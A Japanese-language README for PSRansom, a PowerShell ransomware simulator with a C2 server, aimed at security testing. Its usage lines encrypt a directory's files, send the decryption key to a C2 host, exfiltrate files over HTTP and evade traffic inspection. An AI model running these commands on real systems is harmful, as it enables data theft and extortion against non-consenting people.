
C2サーバー付きPowerShellランサムウェアシミュレーター

PSRansom は、C2サーバー機能を備えたPowerShellランサムウェアシミュレーターです。このツールは、PowerShellがインストールされた任意のシステムで、一般的なランサムウェアの暗号化プロセスをシミュレートするのに役立ちます。統合されたC2サーバーにより、HTTPを介してファイルを窃取し、クライアント情報を受信できます。
2つの要素間のすべての通信は、トラフィック検査メカニズムに検出されないように暗号化またはエンコードされていますが、HTTPSは一切使用されていません。
完全なリポジトリをクローンするか、zipファイルをダウンロードすることをお勧めします。 以下のコマンドで実行できます。
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: このツールは、PowerShell上でC2機能を備えた
一般的なランサムウェアの暗号化プロセスをシミュレートします。
Usage: .\PSRansom.ps1 -e ディレクトリ -s C2サーバー -p C2ポート
すべてのファイルを暗号化し、復号キーをC2サーバーに送信します
-x を使用してファイルを窃取し、C2サーバー上で復号します
.\PSRansom.ps1 -d ディレクトリ -k 復号キー
復号キー文字列を使用してすべてのファイルを復号します
Warning: すべての情報は暗号化されずにC2サーバーに送信されます
ファイルを復元するには、事前に生成された復号キーが必要です
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
このプロジェクトはGNU 3.0ライセンスの下で提供されています。詳細はLICENSEファイルを参照してください。
このツールは、Joel Gámez Molina // @JoelGMSec によって一から作成および設計されました。
このソフトウェアは、いかなる種類の保証も提供しません。その使用は、教育環境およびクライアントの適切な同意を得たセキュリティ監査に限定されます。誤用またはそれによって引き起こされる可能性のある損害について、私は責任を負いません。
詳細については、Twitterの @JoelGMSec または私のブログ darkbyte.net でご連絡ください。
コーヒーを買って私の活動を支援できます: